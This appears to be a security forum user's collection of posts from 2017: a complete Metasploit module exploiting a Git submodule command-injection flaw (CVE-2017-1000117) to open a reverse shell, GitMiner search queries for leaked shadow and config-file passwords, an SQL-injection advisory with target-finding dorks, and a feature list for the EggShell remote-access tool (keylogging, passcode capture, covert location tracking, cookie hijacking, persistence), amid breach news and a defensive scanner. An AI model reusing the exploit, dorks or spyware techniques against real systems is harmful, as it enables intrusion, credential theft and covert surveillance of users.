Everything posted by Fi8sVrs

  1. EDB-ID: 42599
     Author: Metasploit
     Published: 2017-08-31
     CVE: CVE-2017-1000117
     Type: Remote
     Platform: Python
     Tags: Metasploit Framework
     Vulnerable App: N/A

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'           => 'Malicious Git HTTP Server For CVE-2017-1000117',
        'Description'    => %q(
          This module exploits CVE-2017-1000117, which affects Git version 2.7.5 and lower.
          A submodule of the form 'ssh://' can be passed parameters from the username
          incorrectly. This can be used to inject commands to the operating system when
          the submodule is cloned.

          This module creates a fake git repository which contains a submodule containing
          the vulnerability. The vulnerability is triggered when the submodules are
          initialised.
        ),
        'License'        => MSF_LICENSE,
        'References'     => [
          ['CVE', '2017-1000117'],
          ['URL', 'http://seclists.org/oss-sec/2017/q3/280' ]
        ],
        'DisclosureDate' => 'Aug 10 2017',
        'Targets'        => [
          [
            'Automatic', {
              'Platform' => [ 'unix' ],
              'Arch'     => ARCH_CMD,
              'Payload'  => {
                'Compat' => {
                  'PayloadType' => 'python'
                }
              }
            }
          ]
        ],
        'DefaultOptions' => {
          'Payload' => 'cmd/unix/reverse_python'
        },
        'DefaultTarget'  => 0
      )
    )

    register_options(
      [
        OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty for random)', '']),
        OptString.new('GIT_SUBMODULE', [false, 'The path to use as the malicious git submodule (empty for random)', ''])
      ]
    )
  end

  def setup
    @repo_data = {
      git: { files: {} }
    }
    setup_git
    super
  end

  def setup_git
    # URI must start with a /
    unless git_uri && git_uri =~ /^\//
      fail_with(Failure::BadConfig, 'GIT_URI must start with a /')
    end

    payload_cmd = payload.encoded + " &"
    payload_cmd = Rex::Text.to_hex(payload_cmd, '%')

    submodule_path = datastore['GIT_SUBMODULE']
    if submodule_path.blank?
      submodule_path = Rex::Text.rand_text_alpha(rand(8) + 2).downcase
    end

    gitmodules = "[submodule \"#{submodule_path}\"]
    path = #{submodule_path}
    url = ssh://-oProxyCommand=#{payload_cmd}/
"

    sha1, content = build_object('blob', gitmodules)
    @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content

    tree = "100644 .gitmodules\0#{[sha1].pack('H*')}"
    tree += "160000 #{submodule_path}\0#{[sha1].pack('H*')}"
    sha1, content = build_object('tree', tree)
    @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content

    ## build the supposed commit that dropped this file, which has a random user/company
    email = Rex::Text.rand_mail_address
    first, last, company = email.scan(/([^\.]+)\.([^\.]+)@(.*)$/).flatten
    full_name = "#{first.capitalize} #{last.capitalize}"
    tstamp = Time.now.to_i
    author_time = rand(tstamp)
    commit_time = rand(author_time)
    tz_off = rand(10)
    commit = "author #{full_name} <#{email}> #{author_time} -0#{tz_off}00\n" \
             "committer #{full_name} <#{email}> #{commit_time} -0#{tz_off}00\n" \
             "\n" \
             "Initial commit to open git repository for #{company}!\n"
    sha1, content = build_object('commit', "tree #{sha1}\n#{commit}")
    @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content
    @repo_data[:git][:files]['/HEAD'] = "ref: refs/heads/master\n"
    @repo_data[:git][:files]['/info/refs'] = "#{sha1}\trefs/heads/master\n"
  end

  # Builds a Git object
  def build_object(type, content)
    # taken from http://schacon.github.io/gitbook/7_how_git_stores_objects.html
    header = "#{type} #{content.size}\0"
    store = header + content
    [Digest::SHA1.hexdigest(store), Zlib::Deflate.deflate(store)]
  end

  # Returns the Git object path name that a file with the provided SHA1 will reside in
  def get_path(sha1)
    sha1[0...2] + '/' + sha1[2..40]
  end

  def exploit
    super
  end

  def primer
    # add the git and mercurial URIs as necessary
    hardcoded_uripath(git_uri)
    print_status("Malicious Git URI is #{URI.parse(get_uri).merge(git_uri)}")
  end

  # handles routing any request to the mock git, mercurial or simple HTML as
  # necessary
  def on_request_uri(cli, req)
    # if the URI is one of our repositories and the user-agent is that of git/mercurial
    # send back the appropriate data, otherwise just show the HTML version
    user_agent = req.headers['User-Agent']
    if user_agent && user_agent =~ /^git\// && req.uri.start_with?(git_uri)
      do_git(cli, req)
      return
    end

    do_html(cli, req)
  end

  # simulates a Git HTTP server
  def do_git(cli, req)
    # determine if the requested file is something we know how to serve from our
    # fake repository and send it if so
    req_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, '')
    if @repo_data[:git][:files].key?(req_file)
      vprint_status("Sending Git #{req_file}")
      send_response(cli, @repo_data[:git][:files][req_file])
    else
      vprint_status("Git #{req_file} doesn't exist")
      send_not_found(cli)
    end
  end

  # simulates an HTTP server with simple HTML content that lists the fake
  # repositories available for cloning
  def do_html(cli, _req)
    resp = create_response
    resp.body = <<HTML
<html>
<head><title>Public Repositories</title></head>
<body>
<p>Here are our public repositories:</p>
<ul>
HTML
    this_git_uri = URI.parse(get_uri).merge(git_uri)
    resp.body << "<li><a href=#{git_uri}>Git</a> (clone with `git clone #{this_git_uri}`)</li>"
    resp.body << <<HTML
</ul>
</body>
</html>
HTML
    cli.send_response(resp)
  end

  # Returns the value of GIT_URI if not blank, otherwise returns a random .git URI
  def git_uri
    return @git_uri if @git_uri
    if datastore['GIT_URI'].blank?
      @git_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 2).downcase + '.git'
    else
      @git_uri = datastore['GIT_URI']
    end
  end
end

     Source: https://www.exploit-db.com/exploits/42599/
  2. This archive contains all of the 171 exploits added to Packet Storm in August, 2017.
     Download: https://packetstormsecurity.com/files/143974/Packet-Storm-New-Exploits-For-August-2017.html
  3. HackerOne aims to pay bug bounty hunters $100 million by 2020
     https://hackerone.com/uber
     https://zerodium.com/tor.html - Sep. 13, 2017 - ZERODIUM, the premium zero-day acquisition platform, announces and hosts a Tor Browser Zero-Day Bounty. ZERODIUM will pay a total of one million U.S. dollars ($1,000,000) in rewards to acquire zero-day exploits for Tor Browser on Tails Linux and Windows.
     https://www.pornhub.com/support - Aug. 10, 2017 - Pornhub may provide rewards to eligible reporters of qualifying vulnerabilities. Our minimum reward is $50 USD, and our maximum reward is $25,000 USD. Reward amounts may vary depending upon the severity of the vulnerability reported.
     https://www.dji.com/newsroom/news/dji-to-offer-bug-bounty-rewards-for-reporting-software-issues - Aug. 28, 2017 - DJI To Offer 'Bug Bounty' Rewards For Reporting Software Issues. Rewards for qualifying bugs will range from $100 to $30,000, depending on the potential impact of the threat.
     https://security.samsungmobile.com/rewardsProgram.smsb - Nov. 29, 2017 - Under the Samsung Electronics' Mobile Security Rewards Program, security researchers can collect up to $200,000 per vulnerability, depending on severity, for any of the company's mobile devices that currently receive either monthly or quarterly security updates.
  4. Security researchers at ESET have spotted a new cyber espionage campaign targeting embassies, consulates, and ministries worldwide. Hackers leverage a new backdoor dubbed Gazer to spy on governments and diplomats.

     The campaign, active at least since 2016, was associated with the infamous Russian Turla APT group. Researchers from Kaspersky have also monitored this campaign, which they called the ‘Whitebear’ APT campaign.

     The Gazer backdoor was written in C++; hackers deliver the malicious code via spear phishing emails and compromise the targeted computers in two stages. In the first stage, the malware drops another backdoor dubbed Skipper, then installs the Gazer malicious code. The Skipper backdoor was used by the Turla APT group in previous campaigns. While in previous campaigns the Turla APT group leveraged the Carbon and Kazuar backdoors during the second stage of the attack, recently the group opted for the Gazer backdoor.

     To remain stealthy and evade detection, the threat actor leveraged compromised, legitimate websites as a proxy, most of them running the WordPress CMS. Gazer’s authors rely heavily on encryption: they use a custom library for 3DES and RSA instead of the Windows Crypto API.

     The Gazer backdoor leverages a code-injection technique to take control of a machine and to remain hidden for a long period of time while exfiltrating information from the targeted machine. It is also able to forward commands received by one infected endpoint to the other infected machines that share the same network.

     ESET malware researchers have identified four different variants of the Gazer backdoor in the wild. Earlier versions of Gazer were signed with a valid certificate issued by Comodo for “Solid Loop Ltd,” while the latest version is signed with an SSL certificate issued to “Ultimate Computer Support Ltd.”

     The backdoor was involved in cyber espionage operations against targets in Southeast Europe and the former Soviet bloc. According to researchers, Gazer has already managed to infect a number of targets worldwide, with most victims located in Europe.

     Source
  5. We’ve said it before: stop reusing passwords on different sites.

     Online criminals have pulled off a tried-and-true password brute-force attack against online marketplace Zazzle. On 25 August, the company notified the Office of the Attorney General in California about a security incident that might have undermined users' account security. As Zazzle explains in a breach notification letter:

     Those behind the attack attempted to authenticate users of the site without their authorization. They did this using password reuse attacks, or by stealing users' login credentials publicly disclosed in the Weebly, Dropbox, LinkedIn, and other "mega-breaches" of 2016 (among other security incidents) and trying them across various web services.

     At this time, it's unclear just how many members the attack might have affected. Zazzle's CTO Bobby Beaver estimates the attackers might have gained access to "thousands of accounts," a general figure which he says represents only "a small percentage of accounts." But even if an attacker did access their profile, Beaver wants to reassure users that they can recover from the hack using the site's password recovery mechanism. As he told ZDNet:

     Rather than take a chance with users' accounts, Zazzle has imposed a mandatory password reset for all members. Users should therefore choose a strong password to protect their account whenever they next visit the online marketplace. Whatever they choose should be one that they haven't used with any of their other accounts.

     That's not to say that Zazzle is sitting on its hands in the meantime, however. The company has implemented a CAPTCHA to prevent automated login attempts. It's also considering the activation of additional security measures. Considering the fact that the company suffered two breaches in August 2016, Zazzle should look into extra measures, such as a two-step verification (2SV) security feature. If it follows that advice, Zazzle's users will thank it in the long run.

     Via: https://www.grahamcluley.com/zazzle-brute-force-attack/
  6. GitMiner

     + Autor: Danilo Vaz a.k.a. UNK
     + Blog: http://unk-br.blogspot.com
     + Github: http://github.com/danilovazb
     + Twitter: https://twitter.com/danilovaz_unk

     WARNING
     +---------------------------------------------------+
     | DEVELOPERS ASSUME NO LIABILITY AND ARE NOT        |
     | RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY    |
     | THIS PROGRAM                                      |
     +---------------------------------------------------+

     Description
     Advanced search tool and automation in Github. This tool aims to facilitate research by code or code snippets on github through the site's search page.

     Motivation
     Demonstrates the fragility of trust in public repositories to store codes with sensitive information.

     Requirements
     lxml
     requests

     Install:
     git clone http://github.com/danilovazb/GitMiner
     sudo apt-get install python-requests python-lxml
     OR
     pip install -r requirements.txt

     Help:
     usage:
     GITMINER v1.1
     Automatic search for GitHub.
     + Autor: Danilo Vaz a.k.a. UNK
     + Blog: http://unk-br.blogspot.com
     + Github: http://github.com/danilovazb
     + Gr33tz: l33t0s, RTFM
     +[WARNING]------------------------------------------+
     | THIS TOOL IS THE PENALTY FOR EDUCATIONAL USE,     |
     | THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE TO   |
     | THE TOOL THAT USE.                                |
     +---------------------------------------------------+
     [-h] [-q 'filename:shadown path:etc'] [-m wordpress] [-o result.txt]

     optional arguments:
       -h, --help            show this help message and exit
       -q 'filename:shadown path:etc', --query 'filename:shadown path:etc'
                             Specify search term
       -m wordpress, --module wordpress
                             Specify the search module
       -o result.txt, --output result.txt
                             Specify the output file where it will be saved

     Example:
     Searching for wordpress configuration files with passwords:
     $:> python git_miner.py -q 'filename:wp-config extension:php FTP_HOST in:file ' -m wordpress -o result.txt
     Looking for Brazilian government files containing passwords:
     $:> python git_miner.py --query 'extension:php "root" in:file AND "gov.br" in:file' -m senhas
     Looking for shadow files on the etc paste:
     $:> python git_miner.py --query 'filename:shadow path:etc' -m root
     Searching for joomla configuration files with passwords:
     $:> python git_miner.py --query 'filename:configuration extension:php "public password" in:file' -m joomla
     Hacking SSH Servers:

     Download: GitMiner-master.zip
     Source: https://github.com/UnkL4b/GitMiner
  7. The Next Generation of Genealogy Sitebuilding versions prior to 11.1.1 suffer from a remote SQL injection vulnerability.

     ==========================================================================================
     The Next Generation of Genealogy Sitebuilding SQL Injection Vulnerability
     ==========================================================================================
     # Exploit Title : The Next Generation of Genealogy Sitebuilding SQL Injection Vulnerability
     # Date : 29th August 2017
     # Author : X-Cisadane
     # CMS Name : The Next Generation of Genealogy Sitebuilding
     # Version : < 11.1.1
     # CMS Developer : http://www.tngsitebuilding.com/
     # Category : Web Application
     # Vulnerability : SQL Injection
     # Tested On : SQLMap 1.1.8.16#dev (Windows 7 64-bit)
     # Greetz to : X-Code YogyaFree, ExploreCrew, CodeNesia, Bogor Hackers Community, Borneo Crew, Depok Cyber, Mantan

     A SQL injection vulnerability has been discovered in The Next Generation of Genealogy Sitebuilding CMS. The vulnerability allows remote attackers to execute their own SQL commands by usage of a vulnerable service value. The vulnerability is located in the primaryID value of the timeline2.php file. Remote attackers are able to execute their own SQL commands by usage of a GET method request with a manipulated primaryID value. Remote attackers are able to read database information by execution of their own SQL commands.

     DORKS (How to find the target):
     inurl:/timeline2.php?primaryID=
     Or "powered by The Next Generation of Genealogy Sitebuilding"
     Or use your own Google Dorks :)

     Proof of Concept
     SQL Injection PoC:
     http://[Site]/[Path]/timeline2.php?primaryID=['SQLi]

     Screenshot (PoC):
     https://s20.postimg.org/asdu29rwt/Screenshot_99.png
     https://s20.postimg.org/wsu6iwakt/Screenshot_100.png

     Source: https://packetstormsecurity.com/files/143954/The-Next-Generation-Of-Genealogy-Sitebuilding-SQL-Injection.html
  8. BinaryAlert: Serverless, Real-time & Retroactive Malware Detection

     BinaryAlert is an open-source serverless AWS pipeline where any file uploaded to an S3 bucket is immediately scanned with a configurable set of YARA rules. An alert will fire as soon as any match is found, giving an incident response team the ability to quickly contain the threat before it spreads.

     Features:
     Built with Amazon Web Services (AWS): An AWS account is all you need to deploy BinaryAlert.
     Broad YARA Support: Add your own YARA rules and/or automatically clone them from third-party repos. PE, math, and hash YARA modules are supported.
     Real-Time: Files uploaded to BinaryAlert (S3 bucket) are immediately queued for analysis.
     Serverless: All computation is handled by Lambda functions. No servers to manage means stronger security and automatic scaling!
     Infrastructure-as-Code: The entire infrastructure is described with Terraform configuration files, enabling anyone to deploy BinaryAlert in a matter of minutes with a single command.
     Retroactive Analysis: After updating the YARA ruleset, BinaryAlert will retroactively scan the entire file corpus to find any new matches.
     Easily Configurable: BinaryAlert configuration is managed in a single Terraform variables file.
     Quality Code: Written in Python3 with unit tests and linting to ensure a clean and reliable codebase.
     Low Cost: The AWS bill is based only on how many files are analyzed.

     Quick Start:

     Install dependencies
     1. Install Python3.6, pip3, virtualenv, and Terraform.
     2. Create a virtual environment: virtualenv -p python3 venv
     3. Activate the virtual env: source venv/bin/activate
     4. Install third-party libraries: pip3 install -r requirements.txt
     If the installation encounters problems finding openssl.h, try export CFLAGS='-I/usr/local/opt/openssl/include' before the install.

     Configure settings
     1. Set your AWS credentials using any method supported by Terraform. The two simplest options are to run aws configure (saves the ~/.aws/credentials file) or
        export AWS_DEFAULT_REGION="region-name"
        export AWS_ACCESS_KEY_ID="access-key"
        export AWS_SECRET_ACCESS_KEY="secret-key"
     2. Fill out the base configuration options in terraform.tfvars

     Deploy:
     python3 manage.py deploy

     In order to receive YARA match alerts, you must manually subscribe to the generated SNS topics. Go to the SNS console and add a subscription to the *_binaryalert_yara_match_alerts topic (which receives YARA match alerts) and the *_binaryalert_metric_alarms topic (which receives CloudWatch alerts if the service is down). SNS supports a variety of subscription endpoints, including email and SMS. SNS subscriptions must be confirmed by the destination, which is why this step can't be automated by Terraform.

     That's it! Now any file you upload to the BinaryAlert S3 bucket will automatically trigger YARA analysis and you can rest easier knowing that your files are safe.

     CLI Tool: manage.py
     For simplicity, BinaryAlert management commands are bundled together in manage.py.
     Usage: python3 manage.py [--help] [command]

     YARA Rules:
     YARA rules are stored in the rules/ folder. See rules/README.md for more information about adding and updating YARA rules.

     Architecture:
     1. The organization collects files and delivers them to their BinaryAlert S3 bucket. Files of interest could include executable binaries, email attachments, documents, etc.
     2. Every file uploaded to the S3 bucket is immediately queued for analysis.
     3. A dispatching Lambda function runs every minute, grouping files into batches and invoking up to dozens of analyzers in parallel.
     4. Each analyzer scans its files using a list of pre-compiled YARA rules.
     5. YARA matches are saved to DynamoDB and an alert is sent to an SNS topic. We use StreamAlert to dispatch these alerts, but other organizations can instead consume the alerts via email or any other supported SNS subscription.
     6. For retroactive analysis, a batching Lambda function enqueues the entire S3 bucket to be re-analyzed.
     7. Configurable CloudWatch alarms will trigger if any BinaryAlert component is behaving abnormally. This will notify a different SNS topic than the one used for YARA match alerts.

     Updating Pip Packages:
     The exact pip3 package versions used are frozen in requirements.txt. However, to make upgrading packages easier, requirements_top_level.txt contains only the top-level packages required by BinaryAlert. To upgrade the package requirements:
     pip3 install -r requirements_top_level.txt --upgrade
     pip3 freeze > requirements.txt

     Directory Overview:
     lambda_functions: Source code for each BinaryAlert Lambda function.
     rules: Collection of public and private YARA rules.
     terraform: AWS infrastructure represented as Terraform configuration files.
     tests: Unit tests and mocks.

     Links: Announcement Post, Twitter (unofficial), Slack (unofficial)

     Download binaryalert-master.zip
     Source: https://github.com/airbnb/binaryalert
  9. If you came across any Facebook message with a video link sent by anyone, even your friend — just don’t click on it.

     Security researchers at Kaspersky Lab have spotted an ongoing cross-platform campaign on Facebook Messenger, where users receive a video link that redirects them to a fake website, luring them to install malicious software. Although it is still unclear how the malware spreads, researchers believe spammers are using compromised accounts, hijacked browsers, or clickjacking techniques to spread the malicious link.

     The attackers make use of social engineering to trick users into clicking the video link, which purports to be from one of their Facebook friends, with a message that reads "< your friend name > Video" followed by a bit.ly link, as shown.

     Here's How this Cross-Platform Malware Works:

     The URL redirects victims to a Google doc that displays a dynamically generated video thumbnail, like a playable movie, based on the sender's images, which if clicked, further redirects users to another customised landing page depending upon their browser and operating system.

     For example, Mozilla Firefox users on Windows are redirected to a website displaying a fake Flash Player Update notice, and are then offered a Windows executable, which is flagged as adware.

     Google Chrome users are redirected to a website that masquerades as YouTube, with a similar YouTube logo, which displays a fake error message popup, tricking victims into downloading a malicious Chrome extension from the Google Web Store. The extension is actually a downloader that downloads a file of the attacker's choice to the victim's computer.

     Users of Apple Mac OS X Safari end up on a web page similar to the one Firefox users see, but customised for macOS users with a fake update for Flash Media Player, which if clicked, downloads an OSX executable .dmg file, which is also adware. The same applies to Linux: the user is redirected to another landing page designed for Linux users.

     The attackers behind the campaign are not actually infecting users of all platforms with any banking Trojan or exploit kits, but with adware, to make a lot of money by generating revenue from ads.

     Spam campaigns on Facebook are quite common. A few years ago, researchers found cyber criminals using booby-trapped .JPG image files to hide their malware in order to infect Facebook users with variants of the Locky ransomware, which encrypts all files on the infected PC until a ransom is paid.

     To keep yourself safe, you are advised not to get curious and look at images or video links sent by anyone, even your friend, without verifying it with them, and always keep your antivirus software up-to-date.

     Via https://thehackernews.com/2017/08/facebook-virus-hacking.html
  10. ZERODIUM pays premium bounties and rewards to security researchers to acquire their original and previously unreported zero-day research affecting major operating systems, software, and devices. While the majority of existing bug bounty programs accept almost any kind of vulnerabilities and PoCs but pay very low rewards, at ZERODIUM we focus on high-risk vulnerabilities with fully functional exploits, and we pay the highest rewards on the market. ZERODIUM is currently acquiring zero-day exploits affecting the following products: https://zerodium.com/program.html
  11. Security researchers are warning of a new, easy-to-exploit email trick that could allow an attacker to turn a seemingly benign email into a malicious one after it has already been delivered to your email inbox.

      Dubbed Ropemaker (which stands for Remotely Originated Post-delivery Email Manipulation Attacks Keeping Email Risky), the trick was uncovered by Francisco Ribeiro, a researcher at email and cloud security firm Mimecast.

      A successful exploitation of the Ropemaker attack could allow an attacker to remotely modify the content of an email sent by the attacker itself, for example swapping a URL with a malicious one. This can be done even after the email has already been delivered to the recipient and made it through all the necessary spam and security filters, without requiring direct access to the recipient’s computer or email application, exposing hundreds of millions of desktop email client users to malicious attacks.

      Ropemaker abuses Cascading Style Sheets (CSS) and Hypertext Markup Language (HTML), which are fundamental parts of the way information is presented on the Internet. Since CSS is stored remotely, researchers say an attacker can change the content of an email through remotely initiated changes made to the desired 'style' of the email, which is then retrieved remotely and presented to the user, without the recipient, even tech-savvy users, knowing about it.

      According to the researchers, the Ropemaker attack could be leveraged in different ways depending upon the creativity of the threat actors. For instance, attackers could replace a URL that originally directed the user to a legitimate website with a malicious one that sends the user to a compromised site designed to infect users with malware or steal sensitive info, such as their credentials and banking details. While some systems are designed to detect the URL switch, preventing users from opening the malicious link, other users could be left at risk.

      Another attack scenario, called the "Matrix Exploit" by Mimecast, is more sophisticated than the "Switch Exploit", and therefore much harder to detect and defend against. In a Matrix Exploit attack, attackers would write a matrix of text in an email and then use the remote CSS to selectively control what is displayed, allowing the attacker to display whatever they want—including adding malicious URLs into the body of the email. This attack is harder to defend against because the initial email received by the user does not display any URL, so most software systems will not flag the message as malicious.

      Although the security firm has not detected the Ropemaker attack in the wild, it believes that this doesn't mean for sure the attack is "not being used somewhere outside the view of Mimecast." According to the security firm, Ropemaker could be used by hackers to bypass most common security systems and trick even tech-savvy users into interacting with a malicious URL.

      To protect themselves from such attacks, users are recommended to rely on web-based email clients like Gmail, iCloud and Outlook, which aren't affected by Ropemaker-style CSS exploits, according to Mimecast. However, email clients like the desktop and mobile versions of Apple Mail, Microsoft Outlook, and Mozilla Thunderbird are all vulnerable to the Ropemaker attack.

      Via https://thehackernews.com/2017/08/change-email-content.html
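      Both the Switch and the Matrix variant described above depend on one thing: the client fetching a stylesheet from the sender's server when the message is displayed, so the rendering is not fixed at the moment the filter scanned it. The following is an added example, not code from Mimecast or the article: a small check a mail gateway or client could run to find remote stylesheet references (external <link rel="stylesheet"> and @import inside <style>) in an HTML body, so such messages can be refused, stripped or re-scanned. Class, function and sample names are this example's own and the three messages are constructed.

```python
"""Flag HTML mail whose styling is fetched from the network at display time.

Added example, not code from Mimecast or the article. Ropemaker depends on
the client loading a stylesheet from the sender's server after delivery,
so a gateway or client-side check can refuse, strip or re-scan messages
that carry such a reference. Class, function and sample names are this
example's own; the three messages below are constructed.
"""
import re
from html.parser import HTMLParser
from typing import List, Tuple

# Absolute http(s) URLs and scheme-relative (//host) URLs are the remote ones;
# relative paths and cid: references cannot reach the sender's server.
REMOTE_URL = re.compile(r"^\s*(?:https?:)?//", re.IGNORECASE)
# @import "..." / @import url(...) inside a <style> block.
CSS_IMPORT = re.compile(
    r"""@import\s+(?:url\(\s*)?["']?((?:https?:)?//[^"')\s;]+)""", re.IGNORECASE)

# Constructed messages: self-contained styling, an external stylesheet, and
# an @import that would be resolved only when the reader opens the mail.
SAFE_MAIL = ("<html><head><style>p { color: #333 }</style></head>"
             "<body><p>Your invoice is attached.</p></body></html>")
LINKED_MAIL = ('<html><head><link rel="stylesheet" href="https://cdn.example.test/mail.css">'
               "</head><body><p>Hello</p></body></html>")
IMPORTED_MAIL = ('<html><head><style>@import url("//cdn.example.test/late.css");'
                 "</style></head><body><p>Hello</p></body></html>")


class RemoteCssFinder(HTMLParser):
    """Collects (kind, url) for every remote stylesheet the message would load."""

    def __init__(self) -> None:
        super().__init__()
        self.references: List[Tuple[str, str]] = []
        self._in_style = False

    def handle_starttag(self, tag, attrs):
        attr = {k.lower(): (v or "") for k, v in attrs}
        if tag == "link":
            rel = attr.get("rel", "").lower().split()
            if "stylesheet" in rel and REMOTE_URL.match(attr.get("href", "")):
                self.references.append(("link", attr["href"].strip()))
        elif tag == "style":
            self._in_style = True   # html.parser hands us the raw CSS text

    def handle_endtag(self, tag):
        if tag == "style":
            self._in_style = False

    def handle_data(self, data):
        if self._in_style:
            for m in CSS_IMPORT.finditer(data):
                self.references.append(("import", m.group(1)))


def remote_css_references(html: str) -> List[Tuple[str, str]]:
    """Remote stylesheet references in an HTML body, in document order."""
    finder = RemoteCssFinder()
    finder.feed(html)
    finder.close()
    return finder.references


def rendering_is_fixed_at_delivery(html: str) -> bool:
    """True when what the filter scanned is what the reader will see."""
    return not remote_css_references(html)


if __name__ == "__main__":
    for label, body in (("safe", SAFE_MAIL), ("link", LINKED_MAIL), ("import", IMPORTED_MAIL)):
        print(label, rendering_is_fixed_at_delivery(body), remote_css_references(body))
```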
  12. Brief Overview

EggShell (formerly NeonEggShell) was a project I started in August of 2015. It is a remote control pentest tool written in python. After trying out Metasploit's "Meterpreter", I decided to create a better, native, secure, and easier tool with most, if not more, commands for macOS and Jailbroken iOS devices. This tool creates a bash payload that spawns a command line session with the target, including extra functionality like downloading files, taking pictures, location tracking, and dozens of other commands. EggShell also has the functionality to handle and switch between multiple targets. Communication between server and target is encrypted with AES.

AES Encrypted Communication

All data sent between the server and target is encrypted with 128 bit AES. This means files, pictures, and commands are encrypted end to end. The server and the payload each have a shared key that is used to encrypt the random AES key that is used for communication. The random AES key is generated each time the server script is started.

Getting Started

To use EggShell, you must have pycrypto and Python 2.7.x installed.

Install using git (macOS/Linux):

git clone https://github.com/neoneggplant/EggShell
cd EggShell
python eggshell.py

Create And Run A Payload

Using the menu, we can choose to create a bash payload; this is what will be run on the target machine. It is a 2 stage payload: it will connect to our eggshell server, download a shell script and tell our server what device it is, and then finally connect back one more time to download and execute the binary.

Example: running the created payload on our target

Back on our server, we can see we received a connection and an eggshell session has been started!
macOS Commands

ls : list contents of directory
cd : change directories
rm : delete file
pwd : get current directory
download : download file
picture : take picture through iSight camera
getpid : get process id
openurl : open url through the default browser
idletime : get the amount of time since the keyboard/cursor were touched
getpaste : get pasteboard contents
mic : record microphone
brightness : adjust screen brightness
exec : execute command
persistence : attempts to connect back every 60 seconds
rmpersistence : removes persistence

iOS Commands

sysinfo : get system information
ls : list contents of directory
cd : change directories
rm : delete file
pwd : get current directory
download : download file
frontcam : take picture through front camera
backcam : take picture through back camera
mic : record microphone
getpid : get process id
vibrate : make device vibrate
alert : make alert show up on device
say : make device speak
locate : get device location
respring : respring device
setvol : set mediaplayer volume
getvol : view mediaplayer volume
isplaying : view mediaplayer info
openurl : open url on device
dial : dial number on device
battery : get battery level
listapps : list bundle identifiers
open : open app
persistence : installs LaunchDaemon, tries to connect every 30 seconds
rmpersistence : uninstalls LaunchDaemon
installpro : installs eggshellpro to device

EggShellPro Commands (Cydia Substrate Extension)

lock : simulate lock button press
wake : wake device from sleeping state
home : simulate home button press
doublehome : simulate home button double press
play : plays music
pause : pause music
next : next track
prev : previous track
getpasscode : log successful passcode attempts
unlock : unlock with passcode
keylog : log keystrokes
keylogclear : clear keylog data
locationservice : turn on or off location services

EggShell Pro

EggShell Pro is a Cydia substrate library that takes advantage of the system functions in iOS.
With this extension, we can perform home button actions, simulate the lock button, toggle location services, and more. Another feature is being able to log the passcode that the iPhone has been unlocked with. When interacting with an iOS device, simply run "installpro" and the dylib file will upload to the device, followed by a respring.

Navigating/Downloading Files

EggShell has a command-line-interface-like feel to it. Using the unix-like commands built into eggshell, we can print the working directory (pwd), list a directory (ls), remove files (rm), and change directories (cd). Using these commands we can easily navigate the file system just like the command line. Using the download command we can download any file securely over our encrypted connection. In the example below, we go through a directory and download a pdf file on the target machine.

Taking Pictures

Taking a photo with the "picture" command on macOS will activate the iSight camera and send the image data back to the server. To take a picture on iOS, use "frontcam" or "backcam".

iOS Location Tracking Even With Location Services Off

EggShellPro lets us send commands to toggle location services on or off. This means even if location services are off, we can turn them on, retrieve the location of the device, and then quickly turn location services off. We get location coordinates of the exact spot the device is currently in and also a convenient link to google maps.

iOS Getting Passcode

EggshellPro hooks into lock screen functions and logs any successful passcode entry on the device in memory. When we run "getpasscode" we are sent back the passcode that was used last to unlock the device.

macOS Hijacking Safari Facebook Sessions

With the command getfacebook, there is a special function in eggshell that parses through binary cookies from safari. Due to safari binary cookies being unencrypted, we can easily leak the Facebook c_user and xs cookies and use them to log in on another browser.
macOS Persistence

To achieve persistence, even without being root, the command "persistence" adds the payload to the crontab file. It attempts to re-connect every 60 seconds, even after a reboot. To remove persistence, simply enter "rmpersistence" and it should remove itself from crontab.

Recording Audio

Using the "mic record" command, we can asynchronously record audio on both iOS and macOS. This means we can record through the mic while running other commands. When we are finished recording, simply run "mic stop"; this will stop the recording of audio and download the audio data.

Handling Multiple Sessions

With the built-in feature "MultiServer", we can listen for multiple connections. Below is an example with 2 connections on the same device; however, this can be done with multiple devices. As we connect to targets, we can use "sessions" to list all the active sessions, "interact" to interact with a session, "close" to close session numbers, and "back" to go back to the multiserver console.

Payloads In Apps

Payloads can easily be added inside of apps. Below is an example of using the "system()" function to call our payload, still in just one line! This method can be used on both macOS and jailbroken iOS. Immediately after running the app, our payload is run and, just as expected, we have a connection.

Safari Exploit + EggShell

Soon after iOS security researcher Luca Todesco released his browser based 9.3.3 jailbreak, I reused some of his code to demonstrate taking over a device from safari. Below is my video demonstration featured on EverythingApplePro.

Original Video

Thanks For Viewing

lucasjackson5815@gmail.com

Download: EggShell-master.zip

Source: http://lucasjackson.me/index.php/eggshell/
  13. A newly discovered piece of ransomware hides its components inside harmless-looking online images that don't trigger anti-virus detection.

Dubbed SyncCrypt, the ransomware is distributed through spam emails that feature attachments containing WSF files pretending to be court orders. Once the attachments are executed, embedded JScript fetches seemingly innocuous images from specific locations and extracts malicious components hidden inside them.

The ransomware components are stored inside the images as ZIP files, and they aren't triggered if the user simply accesses their URL via browser. The aforementioned JScript, however, not only downloads the images, but also extracts the hidden malicious components (sync.exe, readme.html, and readme.png), BleepingComputer's Lawrence Abrams reveals. The WSF file also creates a Windows scheduled task called Sync.

Once the sync.exe file is executed, it starts scanning the victim's computer for certain file types and encrypts them using AES encryption. The malware encrypts the used AES key with an embedded RSA-4096 public encryption key.

The ransomware targets over 350 file types and appends the .kk extension to them after encryption. The threat skips files located in several folders, namely \windows\, \program files (x86)\, \program files\, \programdata\, \winnt\, \system volume information\, \desktop\readme\, and \$recycle.bin\.

The ransomware demands around $430 to be paid to retrieve the decryption key. The attackers instruct victims to provide them with the key file after paying the ransom to receive a decrypter. The email addresses used as part of the analyzed attack include getmyfiles@keemail.me, getmyfiles@scryptmail.com, and getmyfiles@mail2tor.com.

